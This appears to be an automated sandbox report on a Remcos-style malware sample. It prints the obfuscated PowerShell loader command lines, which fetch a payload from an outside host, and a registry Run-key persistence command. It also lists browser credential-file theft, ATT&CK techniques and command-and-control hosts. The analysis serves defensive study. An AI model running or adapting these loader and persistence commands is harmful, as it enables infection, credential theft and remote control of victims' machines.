                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif"
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#sweetshop forprogrammere bevidstlse #>;$billetkontoret='hovedngles';<#hygroscopically borgerliggr torpets unclassified blokvognens #>;$psykes=$sulfate+$host.ui;function boendes($motorisere){if ($psykes) {$unpictorialised++;}$aarskiftet=$genindkaldte+$motorisere.'length'-$unpictorialised; for( $herregaardene131=4;$herregaardene131 -lt $aarskiftet;$herregaardene131+=5){$pyramidia++;$foredevote+=$motorisere[$herregaardene131];$riskfulness='oprejses';}$foredevote;}function aromastofs($oversigtsbilleders173){ & ($fandangoer) ($oversigtsbilleders173);}$kolonialvares=boendes 'laggmhjelo d lz dreiunsilmat lta fa f e/forb ';$kolonialvares+=boendes 's ks5bran. pr 0bede topi(fl bwk.ldimadenbeard,uako tomwmarrsvis jerkn udat kov oss1agra0t nn.besk0bio ;feri .aphwnobbirumln feu6pick4ansv;nord hen xbirk6 afs4sk d;,oss offrkrydvdomm:spr 1sm g3uud,1a ti. lmu0calo) si man g askehjercde.ak ssioudsm/ rot2depo0verb1erot0elec0spar1,iks0 kun1jord prefyearire orshrees orfoct,ofarax ri /supe1mail3lap 1pyxi.sawn0tyre ';$sparebsserne=boendes ' coeur mmsmatle br rvo,d-u,faakon.gbrn.eforsndolkt kva ';$cafuso=boendes 'cho,hpytot,uttt a dp v,tssmle:mode/ c,u/st eclamiasc irfranesesue yhrgodsfhjemi kunndecrdlivre outrsnek. 
iderorbio .av/mngdv pndn ko,/juk t pr rt,keaw,stunsker,ackires.gdis hspaaebem.d polecalfr bas.procsheinetranaamin ';$luncher=boendes 'r ck>vi,t ';$fandangoer=boendes 'hanhiunruebonixtemp ';$ensnarement='unlabialise167';$totalisatorers='\knighting.pro';aromastofs (boendes ' alg$e phgtinklbadkobrugblayoaindblbrne:pr dt batrba keispim n,nmskumeprigspseutud ao udfl,rouecu tnpas,ehals=pala$decie bebnlaarvcart:rou,achilp ampdri.dsikkaf.intadm.aan.i+scud$,atat,wkworekttgaleahardlbasii li s .tyaequitstoso.chorafstevoverslidsover ');aromastofs (boendes 'venc$ xylgsliclco dovietb pr.ade slprst:undeplordo mi tjordaske sdynasvak.ielemfsheeebrutrtr noskitualcas kon=folk$ entctrapasammfdy euguatsrovso ksp.hu vsinsep implcolliracetj,ds(dsl,$ ug.l z ru.ypenfortc rgthn veesbeormed ) soc ');aromastofs (boendes ' for[embenisbjetr ntrun .g nesfredekaffrfir vlilliwaffc uefehl np lono l einasinnonptkeycmextea byonfedeami rg reiesu erkamp]dis :infe: forstrykee,orcunimu s irnontikluntatr yfejlpforor frooaktutplotoh vec ilkolouplnonc svk=acep lae[sturndrage va tt.le. sk smu feslvecshr useler bevi ddkttriryinwep tchrovero ooptaizoo usctargo,ettllitetnonpyarbeptyvee o,e]tros:tank:.enetkneblsomes rti1dict2well ');$cafuso=$potassiferous[0];$kvatorialguineaner=(boendes 'st.k$vin gvrngl.tolomo,ebov ya voylcoun:hestu.altn maie ru vpi ta tounbroke ouis u.gcyanaestr,naquatredrl notymel.=konsn ampen tuwguls- a.kocivibakkrjconfe pa c u.dtccdc snkeskekcyurimsbalatafdaeflaam ach. osn pree drat sk .wardw excegangballeccro lfrisiinteeanmen undtmaan ');aromastofs ($kvatorialguineaner);aromastofs (boendes 'fors$ rebu spanacineamfev minateernregiejulos onecphenedecln buttoverltilsyunh.. ds
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#sweetshop forprogrammere bevidstlse #>;$billetkontoret='hovedngles';<#hygroscopically borgerliggr torpets unclassified blokvognens #>;$psykes=$sulfate+$host.ui;function boendes($motorisere){if ($psykes) {$unpictorialised++;}$aarskiftet=$genindkaldte+$motorisere.'length'-$unpictorialised; for( $herregaardene131=4;$herregaardene131 -lt $aarskiftet;$herregaardene131+=5){$pyramidia++;$foredevote+=$motorisere[$herregaardene131];$riskfulness='oprejses';}$foredevote;}function aromastofs($oversigtsbilleders173){ & ($fandangoer) ($oversigtsbilleders173);}$kolonialvares=boendes 'laggmhjelo d lz dreiunsilmat lta fa f e/forb ';$kolonialvares+=boendes 's ks5bran. pr 0bede topi(fl bwk.ldimadenbeard,uako tomwmarrsvis jerkn udat kov oss1agra0t nn.besk0bio ;feri .aphwnobbirumln feu6pick4ansv;nord hen xbirk6 afs4sk d;,oss offrkrydvdomm:spr 1sm g3uud,1a ti. lmu0calo) si man g askehjercde.ak ssioudsm/ rot2depo0verb1erot0elec0spar1,iks0 kun1jord prefyearire orshrees orfoct,ofarax ri /supe1mail3lap 1pyxi.sawn0tyre ';$sparebsserne=boendes ' coeur mmsmatle br rvo,d-u,faakon.gbrn.eforsndolkt kva ';$cafuso=boendes 'cho,hpytot,uttt a dp v,tssmle:mode/ c,u/st eclamiasc irfranesesue yhrgodsfhjemi kunndecrdlivre outrsnek. 
iderorbio .av/mngdv pndn ko,/juk t pr rt,keaw,stunsker,ackires.gdis hspaaebem.d polecalfr bas.procsheinetranaamin ';$luncher=boendes 'r ck>vi,t ';$fandangoer=boendes 'hanhiunruebonixtemp ';$ensnarement='unlabialise167';$totalisatorers='\knighting.pro';aromastofs (boendes ' alg$e phgtinklbadkobrugblayoaindblbrne:pr dt batrba keispim n,nmskumeprigspseutud ao udfl,rouecu tnpas,ehals=pala$decie bebnlaarvcart:rou,achilp ampdri.dsikkaf.intadm.aan.i+scud$,atat,wkworekttgaleahardlbasii li s .tyaequitstoso.chorafstevoverslidsover ');aromastofs (boendes 'venc$ xylgsliclco dovietb pr.ade slprst:undeplordo mi tjordaske sdynasvak.ielemfsheeebrutrtr noskitualcas kon=folk$ entctrapasammfdy euguatsrovso ksp.hu vsinsep implcolliracetj,ds(dsl,$ ug.l z ru.ypenfortc rgthn veesbeormed ) soc ');aromastofs (boendes ' for[embenisbjetr ntrun .g nesfredekaffrfir vlilliwaffc uefehl np lono l einasinnonptkeycmextea byonfedeami rg reiesu erkamp]dis :infe: forstrykee,orcunimu s irnontikluntatr yfejlpforor frooaktutplotoh vec ilkolouplnonc svk=acep lae[sturndrage va tt.le. sk smu feslvecshr useler bevi ddkttriryinwep tchrovero ooptaizoo usctargo,ettllitetnonpyarbeptyvee o,e]tros:tank:.enetkneblsomes rti1dict2well ');$cafuso=$potassiferous[0];$kvatorialguineaner=(boendes 'st.k$vin gvrngl.tolomo,ebov ya voylcoun:hestu.altn maie ru vpi ta tounbroke ouis u.gcyanaestr,naquatredrl notymel.=konsn ampen tuwguls- a.kocivibakkrjconfe pa c u.dtccdc snkeskekcyurimsbalatafdaeflaam ach. osn pree drat sk .wardw excegangballeccro lfrisiinteeanmen undtmaan ');aromastofs ($kvatorialguineaner);aromastofs (boendes 'fors$ rebu spanacineamfev minateernregiejulos onecphenedecl
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "humplers" /t reg_expand_sz /d "%frenetic% -windowstyle 1 $overrankness=(gp -path 'hkcu:\software\procentangivelses\').mannas;%frenetic% ($overrankness)"
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2590039170.0000000007790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerB6\;
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerB6\]
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerB6\hic ProviderB
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2590039170.0000000007790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerL
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerNq#T
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2627856927.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerW
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager5|q
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerB6\
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerB6\\Mi{#oTo
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                Source: msiexec.exe, 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerB6\ypt
                Source: msiexec.exe, 00000008.00000003.2592576113.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2627856927.0000000007790000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2592297070.0000000007790000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_234B2933 cpuid 8_2_234B2933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_234B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_234B2264
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 14_2_004082CD
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041739B GetVersionExW, 13_2_0041739B

                Stealing of Sensitive Information

                Source: Yara match File source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 14_2_004033F0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 14_2_00402DB3
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 14_2_00402DB3
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 5704, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-G9FJB6
                Source: Yara match File source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                ATT&CK techniques by tactic (numbers in parentheses are the counts the report's matrix shows beside a technique):
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation (1); Native API (11); Command and Scripting Interpreter (22); PowerShell (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: Scripting (1); DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (412); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (11); Credentials in Registry (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (27); Security Software Discovery (41); Virtualization/Sandbox Evasion (31); Process Discovery (4); Application Window Discovery (1); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Input Capture (11); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1534998; Sample: MARSS-FILTRY_ZW015010024.bat; Start date: 16/10/2024; Architecture: WINDOWS; Score: 100
                Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
                Network nodes:
                • iniiivan.duckdns.org (94.198.96.165; ports 49887, 49894, 53848; ASSEFLOWAmsterdamInternetExchangeAMS-IXIT, Italy), contacted by msiexec.exe; signature: Uses dynamic DNS services
                • geoplugin.net (178.237.33.50; ports 49895, 80; ATOM86-ASATOM86NL, Netherlands), contacted by msiexec.exe
                • careerfinder.ro (185.248.196.6; ports 443, 49704, 49870; TES-ASRO, Romania), contacted by the powershell.exe started by cmd.exe
                Process tree:
                • powershell.exe (started by the sample): Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
